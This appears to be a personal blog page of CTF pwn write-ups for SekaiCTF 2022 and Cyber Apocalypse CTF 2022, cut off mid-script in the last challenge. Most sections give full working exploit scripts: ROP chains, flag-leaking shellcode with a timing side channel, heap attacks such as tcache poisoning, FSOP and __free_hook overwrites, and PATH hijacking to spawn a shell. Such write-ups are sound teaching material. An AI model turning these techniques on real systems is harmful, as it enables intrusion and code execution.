roderick - record and learn!

[Pinned] About my blog site

Wed, 05 Apr 2023 17:42:44 +0800

About my blog site.

TL;DR:

👉 Click select language button in the upper right corner of the page to read posts written in Chinese

👉 Use search box to find an article with keywords

👉 All previous blogs are saved in this site, try to find it~

👉 Still have a question, email me to [email protected]"target="_blank" rel="external nofollow noopener noreferrer">[email protected]

I have two same blog sites:

I have deployed two identical sites, one on Github Pages and the other on a Chinese Aliyun VPS. The purpose of this is to increase the speed of access and to help me backup my blog. I write blog posts in both English and Chinese, and they are stored in separate folders. To switch between languages and read more posts, please click the language switch button.

If you encounter a The page you're looking for doesn't exist error, please do not worry as I have recently refactored my site settings, resulting in some changed links. You can search for articles on my blog site using keywords. The search box is located in the upper right corner of the page. For example, you can use house of apple to search for all articles related to house of apple.

If you are unable to find search results, please switch to a different language and try again. If you still cannot find what you are looking for, it is possible that I have not written any blogs about the topic you are searching for.😅

Some original blog links need to be replaced, for example https://www.roderickchan.cn/2023-02-20-the-art-of-shellcode/ needs to be replaced by https://www.roderickchan.cn/zh-cn/2023-02-20-the-art-of-shellcode/, then it can only be accessed.

2022-SekaiCTF-Pwn-Wp-Gets-Bfs

Mon, 03 Oct 2022 13:09:01 +0800

Note: writeup for gets and BFS

This ctf game meets The National Day, so I don’t have enough time to play.

If you have any questions about my writeup, please leave a message or email me.

If images are not loaded, you can click here to download the PDF.

1 Gets

first blood
spend 5 hours

It’s a simple challenge, only do gets at main function.

All stages in summary :

prepare ropchain data at .bss
rop attack to call mmap, allocate an rwx page
gets(rwx_page) and jmp to run shellcode
leak flag by side-channel attack trick

The detail information of each stage is following.

1-1 Get Limited Gadgets for Binary

This challenge is just about ROP attack, but it’s more complicated than other normal ROP challenges. Because there are not enough gadgets to use. No csu gadgets and only two ppr gadgets exist:

1
2

0x000000000040114d: pop rbp; ret;
0x000000000040116a: pop rdi; ret;

Fortunately, the magic gadget add dword ptr [rbp - 0x3d], ebx ; nop ; ret can be used, its opcode is 015dc3. To find this gadget by the command: ropper -f ./chall --opcode 015dc3。

In fact, the magic gadget is powerful, we can change the content of the address if rbp and rbx register is controlled. And we don’t need to leak any address, since the base address makes no difference for add operator. Now, we can control rbp by pop rbp; ret, and we need to find a gadget to control rbx register.

1-2 Find Gadgets to Control Rbx Register

As we know, there’re many glibc address left at stack when a function is called. So, if we do stack pivoting by leave; ret, move the stack to bss segment, call gets again, the glibc address will be left at .bss. Okay, let’s do it and observe the data on stack:

to disassemble at 0x7f2b2e0c0514 (_IO_getline_info+292):

Once r12 is writable, we can do stack pivot and call this gadget to control rbx register, and we’re able to use magic gadget to change other libc-address left at .bss.

In above image, the layout of rop data should be:

1
2
3

pop rbp; ret
0x404378
leave; ret

And we need to put data at 0x404388 before doing stack pivot，just input by gets：

1
2
3

pop rdi; ret
0x404388
elf.plt.gets

At first, I choose to use magic gadget to change 0x7f2b2e0c0514 (_IO_getline_info+292) to 0x7f2b2e0c0527 (_IO_getline_info+311). Because the r12 register is not always writable.

Now, we get a gadget pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15 in .bss, and we can prepare the data , then call the gadget by leave; ret to control rbx/rbp registers.

1-3 Leave More Glibc Address at .Bss

As we can control rbx and rbp register, the next stage is to do stack pivot again and again, to leave more glibc address at .bss area.

One area is used for build the final ropchain, as I find some gadgets to call mmap(0xdead000, 0x1000, 7, 0x22, -1, 0).

This gadget A nearby setcontex is used to control argument registers:

This gadget B is used to control rdx register:

Another area is used to call gets and input data:

1-4 Construct the Final Ropchain

If we want to modify the content of a glibc address left at bss segment , the steps are:

input data by calling get(address), prepare data for rbx and rbp
leave; ret and call pop rbx; pop rbx;...ret
magic gadget to change the content of target address
leave; ret to the specific area and do other things

The layout of final ropchain should be like:

Control rdx register by gadget B, then the arguments registers can be controlled by gadget A, then do stack pivot to call mmap64. Finally, call gets to put shellcode at rwx mapping memory.

After doing rop again and again and again, we get the layout:

1-5 Leak Flag by Side-Channel Attack

Only read/open/mmap are allowed.

Leak the content of flag.txt by side-channel attack, the steps:

open flag.txt
read flag.txt
compare flag.txt byte by byte
wait for read if we guess right, otherwise kill the problem

Therefor, the shellcode is:

sc = """
push 0x1010101 ^ 0x747874
xor dword ptr [rsp], 0x1010101
mov rax, 0x2e67616c662f7265
push rax
mov rax, 0x73752f656d6f682f
push rax
push rsp
pop rdi
xor esi, esi
xor edx, edx
mov rax, 2 /* open flag.txt*/
syscall
mov rdi, rax
mov rsi, rsp
mov rdx, 0x60
mov rax, 0
syscall
cmp byte ptr [rsi + {}], {}
jnz $+14
nop
nop
xor edi, edi
xor edx, edx
mov dl, 0xf0
xor eax, eax
syscall
mov rax, 60
syscall
""".format(index, guess_chr)

The format of flag is SEKAI\{[A-Z_]+\}, so index starts at 6.

1-6 EXP

exp.py:

#!/usr/bin/env python3
# Date: 2022-10-01 20:48:27
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug Cmd: python3 exp.py -E "6,84" debug ./chall -t -b 0x401219

from pwncli import *
cli_script()

context.arch = "amd64"

io: tube = gift.io

bss_start = 0x404000
fake_rbp1 = bss_start + 0x800
fake_rbp2 = bss_start + 0x400

# 0x000000000040114c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
pop_rdi_ret = 0x40116a
puts_plt = 0x401060
pop_rbp_ret = 0x40114d
leave_ret = 0x401219
ret = 0x40101a
magic_gadget = 0x40114c

# stack pivot and call gets to leave glibc address on bss
data = flat({
    40: [
        pop_rdi_ret,
        fake_rbp1,
        puts_plt,
        pop_rbp_ret,
        fake_rbp1,
        leave_ret
    ]
})
sl(data)

# stack pivot and call gets again
data = flat([
    fake_rbp1 + 0x300,
    pop_rdi_ret,
    fake_rbp2,
    puts_plt,
    pop_rbp_ret,
    fake_rbp2,
    leave_ret
])

sl(data)

target_addr1 = fake_rbp1 - 0x80 # pop rbx; pop rbp, r12 13 14 15
target_addr2 = fake_rbp2 - 0x20 # mov     rcx, [rdx+0A8h]
target_addr3 = fake_rbp2 - 0x80+0x38 # 0x90529: pop rdx; pop rbx; ret; 
target_addr4 = fake_rbp2 - 0x80 # mmap
data = flat([
    fake_rbp2 + 0x100,
    pop_rdi_ret,
    target_addr1 + 8,
    puts_plt,
    pop_rbp_ret,
    target_addr1-8,
    leave_ret
])

sl(data)


# 0x8f4e4: mov rax, qword ptr [rdi + 0x68]; ret;
# first time to call magic gadget
data = flat({
    40: [
        0x13,
        target_addr1+0x3d,
        0, 0, 0, 0, 
        magic_gadget,
        [ret] * 0x40,
        [
        pop_rdi_ret,
        target_addr1 + 8,
        puts_plt,
        pop_rbp_ret,
        target_addr1-8,
        leave_ret] * 3,
        [
        pop_rdi_ret,
        target_addr3 + 8,
        puts_plt,
        pop_rdi_ret,
        target_addr2 + 8,
        puts_plt,
        pop_rdi_ret,
        target_addr4 + 8,
        puts_plt,
        pop_rbp_ret,
        target_addr3-8,
        leave_ret
        ]

    ]
})
sl(data)

# 11EBC0 : mmap64
data = flat([
        0x11EBC0  - 0x80514 ,
        target_addr4+0x3d,
        0, 0, 0, 0, 
        magic_gadget,
        pop_rbp_ret,
        0x404a10,
        leave_ret
    ]
)
sl(data)

# 0x90529: pop rdx; pop rbx; ret; 
data = flat([
        0x90529 - 0x219aa0 + 0x100000000,
        target_addr3+0x3d,
        0, 0, 0, 0, 
        magic_gadget,
        pop_rbp_ret,
        0x404a10+0x30,
        leave_ret
    ]
)
sl(data)

# 0x53b56: setcontext+XXX
data = flat([
        0x53B56 - 0x806c6,
        target_addr2+0x3d,
        0, 0, 0, 0, 
        magic_gadget,
        pop_rbp_ret,
        0x404a10+0x30 * 2,
        leave_ret
    ]
)
sl(data)


sl(p64(target_addr2)*2 + p64(ret) * 0x1 + p64(ret)[:6])


# mmap(0xdead000, 0x1000, 7, 0x22, -1, 0)
sl(flat({
    0: pop_rbp_ret,
    8: target_addr4-8,
    0x10: leave_ret,
    0xa8-8: ret, # rcx
    0x70-8: 0x1000, # rsi
    0x68-8: 0xdead000, # rdi
    0x88-8: 7, # rdx
    0x98-8: 0x22, # rcx
    0x28-8: p64(0xffffffffffffffff), # r8
    0x30-8: 0, # r9
}))

# read and jump to run shellcode
sl(flat([
    pop_rdi_ret,
    0xdead000,
    puts_plt,
    0xdead000
]))

other_argv:str = gift['extra_argv']
index, guess_chr = other_argv.strip().split(",")
sc = """
push 0x1010101 ^ 0x747874
xor dword ptr [rsp], 0x1010101
mov rax, 0x2e67616c662f7265
push rax
mov rax, 0x73752f656d6f682f
push rax
push rsp
pop rdi
xor esi, esi
xor edx, edx
mov rax, 2 /* open flag.txt*/
syscall
mov rdi, rax
mov rsi, rsp
mov rdx, 0x60
mov rax, 0
syscall
cmp byte ptr [rsi + {}], {}
jnz $+14
nop
nop
xor edi, edi
xor edx, edx
mov dl, 0xf0
xor eax, eax
syscall
mov rax, 60
syscall
""".format(index, guess_chr)

sl(asm(sc))

t1 = time.time()
io.can_recv_raw(timeout=3)
t2 = time.time()

if t2 - t1 < 1:
    ic()
    exit(1)
else:
    print("guess right: ", guess_chr)
    ic()
    exit(0)

and bruteforce.py:

#!/usr/bin/env python3
import os, string
cmd = "python3 exp_cli_remote.py -E \"{},{}\" re challs.ctf.sekai.team:4000 -nl"

flag = "SEKAI{"
index = 6
for x in range(index, index+0x40):
    for char in string.ascii_uppercase + "_}":
        cmd_ = cmd.format(x, ord(char))
        if os.system(cmd_) == 0:
            flag += char
            print(flag)
            if char == "}":
                exit(0)
            break

Please install RoderickChan/pwncli: Do pwn by cli (github.com) if you want to use my exp, then python3 bruteforce.py to get the flag.

The remote flag is SEKAI{IT_KINDA_GETS_COMPLICATED}. I don’t know why I cannot get I in the word KINDA……it’s magic.

2 BFS

second blood
spend 3.5 hours

This challenge is about C++ std::queue. As long as you understand the mechanism of queue, you can solve the task quickly.

All steps in summary:

heap fengshui using std:queue pop and push
leak heap address by parent array overflow
tcachebin poisoning to allocate at .bss and to modify adj_matrix
change the content of got.plt and call system("/bin/sh") when the program exits

2-1 Analysis of Program

As the source code is given, I will analyze the program based on that. It’s BSF algorithm to find the short path in an undirected graph. The edge has no direction because it’s adjacent matrix is symmetric.

I write my analysis on comment.

#include<vector>
#include<queue>
#include<utility>
#include<string>
#include<iostream>
#include <unistd.h>
#include <signal.h>

#define MAX_NUMBER_OF_NODES 256

std::queue<uint8_t> q;
uint8_t *vis = new uint8_t[MAX_NUMBER_OF_NODES];
uint8_t *parent = new uint8_t[MAX_NUMBER_OF_NODES];
uint8_t *adj_matrix = new uint8_t[MAX_NUMBER_OF_NODES*MAX_NUMBER_OF_NODES];

void sig_alarm_handler(int signum)  {
	std::cout << "Connect Timeout" << std::endl ;
	exit(1);
}

void init() {
	setvbuf(stdout,0,2,0);
	signal(SIGALRM,sig_alarm_handler);
	alarm(120);
}

void bfs(uint from, uint dest, uint as )  {
    uint tmp = 0;
    parent[from] = from; // root node of a path, whose parent node is itself --> overflow3
    q.push(from);
    vis[from] = 1; // --> overflow4
    while(!q.empty())   {
        tmp = q.front();
        q.pop();
        for (int i = 0; i < n; i++) {
            if(adj_matrix[tmp*MAX_NUMBER_OF_NODES + i] != 0 && vis[i] != 1) {
                vis[i] = 1;
                parent[i] = tmp;
                q.push(i);
                if (i == dest)
                    return;   // return, the nodes in the queue are not released
            }
        }
    }
    return;
}

int main(int argc, char const *argv[])
{
    init();
    std::string choice;
    uint q, n,k;
    uint from, dest, crawl;
    std::cin >> q;
    for (uint l = 0; l < q; l++) // input times for running
    {
        std::cin >> n >> k; // number of nodes and edges
        if(n > MAX_NUMBER_OF_NODES) {
            exit(0);
        }
        for (size_t i = 0; i < n; i++)
            for (size_t j = 0; j < n; j++)
                adj_matrix[i*MAX_NUMBER_OF_NODES + j] = 0; // adjacent matrix initial
        for (size_t i = 0; i < n; i++)
            vis[i] = 0; // visited matrix initial
        for (size_t i = 0; i < k; i++)
        {
            std::cin >> from >> dest; // input for adjacent matrix --> overflow1
            adj_matrix[from*MAX_NUMBER_OF_NODES + dest]++;
            adj_matrix[dest*MAX_NUMBER_OF_NODES + from]++;
        }
        std::cin >> from >> dest; // from node and dest node
        bfs(from, dest, n);
        crawl = dest;
        std::cout << "Testcase #" << l << ": ";
        while(parent[crawl] != crawl)   { // find path and print the path --> overflow2
            std::cout << crawl << " ";
            crawl = parent[crawl];
        }
        std::cout << crawl << std::endl;
    }
    return 0;
}

It’s obvious that the vulnerability of this program is that from and dest are not checked, and we can input large number to cause overflow.

There’re two vulns for read and write:

Write: At overflow2 I labeled, one byte is leaked.

Read: At overflow1, we can change the content of the address without leaking, like using a add gadgets.

The type of these two variables is uint, as we can overflow to read and write data at higher address, but cannot read/write lower address.

The layout of heap in this program after initial:

low address ---> queue
                 vis
                 parent
high address---> adj_matrix

In order to leak and write useful data, we need to allocate chunks after adj_matrix. So how to trigger malloc and free, the answer is in std:queue.

2-2 Mechanism of Std::queue

I also don’t know the mechanism of std:queue when I started to solve the task, so I write a test program to trace the chunk operations when std::queue is used.


#include <iostream>
#include <queue>
using namespace std;

std::queue<uint8_t> global_q;
int main()
{
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    puts("push push!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.push(i);
        // printf("push %d\n", i);
    }

    puts("push push!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.push(i);
        // printf("push %d\n", i);
    }

    puts("pop pop!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.pop();
    }
    puts("pop pop!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.pop();
    }

    puts("push push!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.push(i);
        // printf("push %d\n", i);
    }

    puts("push push!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.push(i);
        // printf("push %d\n", i);
    }

    puts("pop pop!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.pop();
    }
    puts("pop pop!!!");
    for (size_t i = 0; i < 256; i++)
    {
        global_q.pop();
    }

    puts("end end!!!");
    return 0;
}

Compile the file and use Arinerron/heaptrace: helps visualize heap operations for pwn and debugging (github.com) to analyze.

In the initial stage, std::queue<uint_8> allocate two chunks, the size is 0x50 and 0x210.

After pushing 0x200 items, malloc(0x200) is triggered.

After popping 0x200 items, the initial chunk is released.

In a word, we can allocate chunk by queue.push and free chunk by queue.pop.

2-4 Malloc and Free Chunks Using Std::queue

Look at the function bfs:

void bfs(uint from, uint dest, uint n )  {
    uint tmp = 0;
    parent[from] = from; // root node of a path, whose parent node is itself --> overflow3
    q.push(from);
    vis[from] = 1; // --> overflow4
    while(!q.empty())   {
        tmp = q.front();
        q.pop();
        for (int i = 0; i < n; i++) {
            if(adj_matrix[tmp*MAX_NUMBER_OF_NODES + i] != 0 && vis[i] != 1) {
                vis[i] = 1;
                parent[i] = tmp;
                q.push(i);
                if (i == dest)
                    return;   // return, the nodes in the queue are not released
            }
        }
    }
    return;
}

On the one hand, we can push items in the for loop, and let it return, so the queue will not be cleared. Let node X connects to all other nodes, and input from=X, dest=255, then in bfs, 255 items are added in the queue and it will return because node X is connected to node 255.

The snippet to trigger malloc:

def push_nodes(from_=0, num=256):
    sl(f"{num} {num-1}")
    for i in range(num):
        if i == from_:
            continue
        sl(f"{from_} {i}")
    
    sl(f"{from_} {num-1}")
    ru("Testcase #")

push_nodes()

On the other hand, we can specify n = 0, then the queue is cleared and trigger free chunks.

2-5 leak heap address and hijack tcache->next

We have to pass safe linking in tcache bins. After controlling the allocation of chunks by std:queue, put one chunk in tcache bins and leak heap address by parent overflow. Then, put two chunks at tcache bins and modify the tcache->next by adj_matrix overflow. Now we can allocate at arbitrary address.

I choose to allocate at 0x4073e0, the address of adj_matrix, and makes adj_matrix be zero.

2-6 Calculate the Appropriate I and J for Adj_matrix

Now the adj_matrix is 0, the problem is how to change the content of target address by adj_matrix overflow. It’s just a basic quadratic equation.

1
2

256 * i + j = t1 (1)
i + 256 * j = t2 (2)

As we know the address of heap area, let t1 = got.plt address and t2 = heap address. When j increases 1, the equation (2) would increases 256, the heap area is large enough and t2 + 256 * X is always writable.

snippet:

def func11(t1, t2):
    y = (256 * t2 - t1) //(256 * 256 -1)
    x = t2 - 256 * y
    x = (t1 - y) // 256
    y = t1 - 256 * x
    print(f"x: {x}, y: {y}")
    return x, y

# 0x407048 --> got.plt@~basic_string
x, y = func11(0x407048, heap_base)

Then, write got.plt@std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string to 0x401925:

add got.plt@std::ios_base::Init::Init to system and write /bin/sh at std::__ioinit. BTW, std::__ioint is on the top of adj_matrix

When the loop ends, ~basic_string will be called.

2-7 Get Shell

The layout of got table and std::__ioinit:

The operation of xmm register fails when call system, so I use the address of call do_system.

Pop shell:

2-8 EXP

#!/usr/bin/env python3
# Date: 2022-10-02 08:23:47
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : python3 exp.py debug ./bfs -t -b 0x401925
#     Remote: python3 exp.py remote ./bfs ip:port

from pwncli import *
cli_script()

context.arch="amd64"

io: tube = gift.io

def push_nodes(from_=0, num=256):
    sl(f"{num} {num-1}")
    for i in range(num):
        if i == from_:
            continue
        sl(f"{from_} {i}")
    
    sl(f"{from_} {num-1}")
    ru("Testcase #")


def clear_queue_and_adjmatrix(dest=0):
    sl("256 0")
    sl(f"0 {dest}")
    ru("Testcase #")

sleep(1)

# count
sl("42")

push_nodes()
push_nodes()

# clear
clear_queue_and_adjmatrix()

push_nodes()
push_nodes()

clear_queue_and_adjmatrix()

heap_base = 0
clear_queue_and_adjmatrix(0x11130)
m = rls("6:").split()
heap_base += (int_ex(m[2]) << 12)

clear_queue_and_adjmatrix(0x11131)
m = rls("7:").split()
heap_base += (int_ex(m[2]) << 20)

clear_queue_and_adjmatrix(0x11132)
m = rls("8:").split()
heap_base += (int_ex(m[2]) << 28)
heap_base -= 0x23000
log_address_ex("heap_base")

push_nodes()
push_nodes(2)
push_nodes(3)

push_nodes(4)
push_nodes(5)
clear_queue_and_adjmatrix()


off = 0x11020
ori_content = ((heap_base + 0x23350) >> 12) ^ (heap_base + 0x11f00) #
write_content = ((heap_base + 0x23350) >> 12) ^ 0x4073e0 # adj_matrix
log_address_ex("ori_content")
log_address_ex("write_content")

# 272 * 256 + 32 = 0x1120
for i in range(4):
    ori1 = ori_content & 0xff
    wri1 = write_content & 0xff
    ori_content >>= 8
    write_content >>= 8
    times = wri1 - ori1 if wri1 >= ori1 else wri1 - ori1 + 0x100
    sl(f"0 {times}")
    for _ in range(times):
        sl(f"272 {i+32}")
    sl("0 0")

push_nodes()
push_nodes(1)
push_nodes(2, 0xf6)


data = p64(0)+b"/bin/sh"
# nodes edges

for x in data:
    sl(f"0 0")
    sl(f"{x} 0")
    ru("Testcase #")


def func11(t1, t2):
    y = (256 * t2 - t1) //(256 * 256 -1)
    x = t2 - 256 * y
    x = (t1 - y) // 256
    y = t1 - 256 * x
    log_ex(f"x: {x}, y: {y}")
    return x, y

x, y = func11(0x407048, heap_base)

ori_content = 0x401090
write_content = 0x401925
log_address_ex("ori_content")
log_address_ex("write_content")

for i in range(3):
    ori1 = ori_content & 0xff
    wri1 = write_content & 0xff
    ori_content >>= 8
    write_content >>= 8
    if ori1 == wri1:
        continue
    times = wri1 - ori1 if wri1 >= ori1 else wri1 - ori1 + 0x100
    sl(f"0 {times}")
    for _ in range(times):
        sl(f"{x} {i+y}")
    sl("0 0")


ori_content = 0x7f2838abd140
write_content = 0x7f2838806d60+0x1b
log_address_ex("ori_content")
log_address_ex("write_content")

for i in range(3):
    ori1 = ori_content & 0xff
    wri1 = write_content & 0xff
    ori_content >>= 8
    write_content >>= 8
    if ori1 == wri1:
        continue
    times = wri1 - ori1 if wri1 >= ori1 else wri1 - ori1 + 0x100
    sl(f"0 {times}")
    for _ in range(times):
        sl(f"{x} {i+y+0x68}")
    sl("0 0")


ia()

Attack remote host:

Reference

1、My Blog

2、Ctf Wiki

3、pwncli

2022-Cyber-Apocalypse-CTF-All-Pwn-Wp

Fri, 20 May 2022 15:07:34 +0800

This is my write-up for all pwn challenges in Cyber-Apocalypse-CTF-2022, I had solved all tasks in two days. Anyway, these pwn challenges are not very hard…

Please leave a message or send me an email if you have any questions about the wp.

1-Entrypoint

Vulnerability

In check_pass：

Look at the if condition about strncmp, you can input anything except 0nlyTh30r1g1n4l to call open_door, in which function you can get flag:

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

sla("> ", "2")

sa("[*] Insert password: ", "wtf")

ia()

2-SpacepirateGoingDeeper

Vulnerability

It’s too easy to get flag…just input DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()
context.update(timeout=10)

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']


sla(">> ", "2")
sa("Username: ", "DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00")

ia()

3-Retribution

A basic stack overflow challenge.

Checksec

Vulnerability

stack overflow:

steps of solution:

leak address of glibc using printf
use rop to get shell

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

sla(">> ", "2")

sa("y =", "a"*8)

m = rls("[*] New coordinates")
log_ex(m)
code_base = u64_ex(m[-6:]) - 0xd70
log_address("code addr", code_base)
set_current_code_base(code_base)

sa("(y/n):", flat({
    88: [
        code_base + 0x0000000000000d33,
        code_base + 0x202F90,
        elf.plt.puts,
        code_base + 0xa22
    ]
}))

set_current_libc_base_and_log(recv_current_libc_addr(), offset='puts')


sa("y =", "a"*8)
sa("(y/n):", flat({
    88: [
        code_base + 0x0000000000000d33,
        libc.search(b"/bin/sh").__next__(),
        libc.sym.system
    ]
}))

ia()

4-Vault-Breaker

A trick of strcpy

Vulnerability

A NULL character would be appended at the end of the dst string in strcpy

Use this tip to make random_key to become ?\x00\x00\x00....\x00, and then in the function secure_password:

every byte of the flag xor with every byte of the key, we know x ^ 0 = x, so it puts flag if the random_key consists of NULL character

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io = gift.io

def genkey(l):
    sla("> ", "1")
    sla("Length of new password (0-31):", str(l))
    ru("New key has been genereated successfully!")


for i in range(31, 0, -1):
    genkey(i)

sla("> ", "2")
ru("Master password for Vault: ")
m = ra()
print(m)

ia()

5-FleetManagement

Checksec

only rt_sigreturn/openat/senfile are allowed

Vulnerability

input 9 to write shellcode：

steps:

openat(-100, "flag.txt", 0)
sendfile(1, 3, 0, 0x30)

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']

data = asm(shellcraft.amd64.pushstr("flag.txt") + 
        """
        push rsp
        pop rsi
        mov edi, 0xffffff9c
        xor edx, edx
        xor eax, eax
        xor r10d, r10d
        mov eax, {}
        syscall
        xor edi, edi
        xor esi, esi
        xchg eax, esi
        inc edi
        mov r10d, 0x30
        mov al, {}
        syscall
        """.format(constants.SYS_openat, constants.SYS_sendfile))

sleep(3)
sl("1")
io.recvuntil("[*] What do you want to do?", timeout=10)
io.recvuntil("[*] What do you want to do?", timeout=10)
sl("9")
sleep(3)
s(data)
ia()

6-Hellbound

Vulnerability

input 1 to leak stack address, and input 3 to assign buf with *buf:

and there is a backdoor function:

steps:

leak stack address
write the address of backdoor at retaddr

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

def leak():
    sla(">> ", "1")
    ru("[+] In the back of its head you see this serial number: [")
    m = ru("]")
    stack_addr = int_ex(m[:-1])
    log_address("stack addr", stack_addr)
    return stack_addr


def writecode(code):
    sla(">> ", "2")
    sa("[*] Write some code: ", code)

def deref():
    sla(">> ", "3")
    ru("The beast went Berserk again!")


sd = leak()
writecode(flat([
    0, 
    sd + 0x50
]))
deref()

writecode(flat([
    0x400977, 0
]))

deref()

sla(">> ", str(0x45))

ia()

7-Bon-Nie-Appetit

Checksec

glibc version is Ubuntu GLIBC 2.27-3ubuntu1.5

Vulnerability

There is a off by one vuln in edit_order, so that you can change the size of the next chunk.

Steps of my solution:

leak libc address by means of the remaining address of bk of a chunk
make overlapping chunk using off-by-one
use tcache poisoning attack to allocate a chunk at __free_hook
change __free_hook to system and free a chunk with /bin/sh

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

def new_order(size, data):
    sla("> ", "1")
    sla("[*] For how many: ", str(size))
    sa("[*] What would you like to order: ", data)

def show_order(i):
    sla("> ", "2")
    sla("[*] Number of order: ", str(i))

def edit_order(i, data):
    sla("> ", "3")
    sla("[*] Number of order: ", str(i))
    sa("[*] New order: ", data)

def dele_order(i):
    sla("> ", "4")
    sla("[*] Number of order: ", str(i))


def fina():
    sla("> ", "5")

new_order(0x18, "a"*0x18)
new_order(0x20, "deadbeef")
new_order(0x10, "a"*0x10)
new_order(0x500, "deadbeef")
new_order(0x10, "/bin/sh\x00")

# leak
dele_order(3)
new_order(0x10, "deadbeef")
show_order(3)
libc_addr = recv_current_libc_addr()
set_current_libc_base_and_log(libc_addr, 0x3ec0d0)
edit_order(0, "a"*0x18+"\x51")

dele_order(2)
dele_order(1)

new_order(0x48, flat({
    0x20: [
        0, 0x21,
        libc.sym.__free_hook
    ]
}))

new_order(0x10, "a"*0x10)
new_order(0x10, p64(libc.sym.system))

dele_order(4)

ia()

8-TrickorDeal

Vulnerability

leak code base address in buy:

uaf in steal:

and there is a backdoor function:

step:

leak code base address
replace the printStorage with unlock_storage
input 1 to get shell

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

sleep(3)

def show():
    sla("[*] What do you want to do? ", "1")

def buy(data):
    sla("[*] What do you want to do? ", "2")
    sa("[*] What do you want!!? ", data)

def offer(i=0, data=None, c='n'):
    sla("[*] What do you want to do? ", "3")
    sla("[*] Are you sure that you want to make an offer(y/n): ", c)
    if c == "y":
        sla("How long do you want your offer to be? ", str(i))
        sa("[*] What can you offer me? ", data)

@sleep_call_after(5)
def steal():
    sla("[*] What do you want to do? ", "4")


buy("a"*0x38)
ru("a"*0x38)
m = rl()

code_base = u64_ex(m[:-1]) - 0x9b0
log_address("code_base", code_base)

steal()

offer(0x50, data=flat_z({
    0x40: [code_base + 0xeff]*2
}), c='y')

show()


ia()

9-Sabotage

Vulnerability

In enter_command_control, there is a heap overflow:

The difference between putenv and setenv in glibc:

putenv will not allocate memory, it uses the parameter and insert the point you offer into the environment variable list; if the env exists, replace it
setenv will call malloc to allocate memory and then copy source string to the new chunk; if the env exists, replace it

When add a new env variable or delete a env variable, realloc will be called to adjust the memory dynamically.

Note: if there’re two or more environment variables with a same key in the environment variable list, only the last one is effective!

Steps of getting shell:

input 2 to call putenv, and make __environ(it’s a global variable in glibc) point to the heap area instead of stack area, by the way, write /bin/sh in /tmp/panel
input 1 and make use of heap oveflow to change the content of ACCESS environment variable, replace it with PATH=/tmp/:/bin:/use/bin, when call system("panel"), it will find the executable binary in PATH, and now /tmp/panel will be chosen firstly and it will be executed with /bin/sh -c
when a script don’t specify a interpreter with #!xxxxx, every line in the file will be executed with the default shell, which is /bin/sh

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']


def access(length, code):
    sla("> ", "1")
    sla("ACCESS code length: ", str(length))
    sla("ACCESS code: ", code) # 0 or \n will stop

def quantum(data, data2):
    sla("> ", "2")
    sla("Quantum destabilizer mount point: ", data)
    sla("uantum destablizer is ready to pass a small armed unit through the enemy's shield: ", data2)


def abort():
    sla("> ", "5")

quantum("panel", "/bin/sh")
access((1 << 64) - 1, flat({
    0x20: "PATH=/tmp:/bin:/usr/bin",
}))

ia()

get shell:

10-Once_and_for_all

It’s a heap challenge about tcache.

Checksec

Vulnerability

UAF in fix:

My solution:

malloc_consolidation to leak glibc address
modify tcache->count using fastbin attack
tcache unlinking to modify stderr->chain and let it point to a heap chunk
prepare a fake _IO_FILE in heap and use FSOP(make use of _IO_str_finish) to getshell

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']


def build_small(idx, size, data="deadbeef"):
    sla(">> ", "1")
    sla("Choose an index: ", str(idx))
    sla("How much space do you need for it: ", str(size))
    if size > 0x1f and size <= 0x38:
        sa("Input your weapon's details: ",data)


def fix_small(idx, size, data=None, v=2):
    sla(">> ", "2")
    sla("Choose an index: ", str(idx))
    sla("How much space do you need for this repair: ", str(size))
    if size > 0x1f and size <= 0x38:
        sa("Input your weapon's details: ", data)
        sla("What would you like to do now?\n1. Verify weapon\n2. Continue\n>> ", str(v))


# show
def examine_small(idx):
    sla(">> ", "3")
    sla("Choose an index: ", str(idx))


def build_big(size=0x1000):
    sla(">> ", "4")
    sla("How much space do you need for this massive weapon: ", str(size))


def giveup():
    sla(">> ", "5")

"""
1. malloc_consolidate to leak glibc address
2. modify tcache->count using fastbin attack
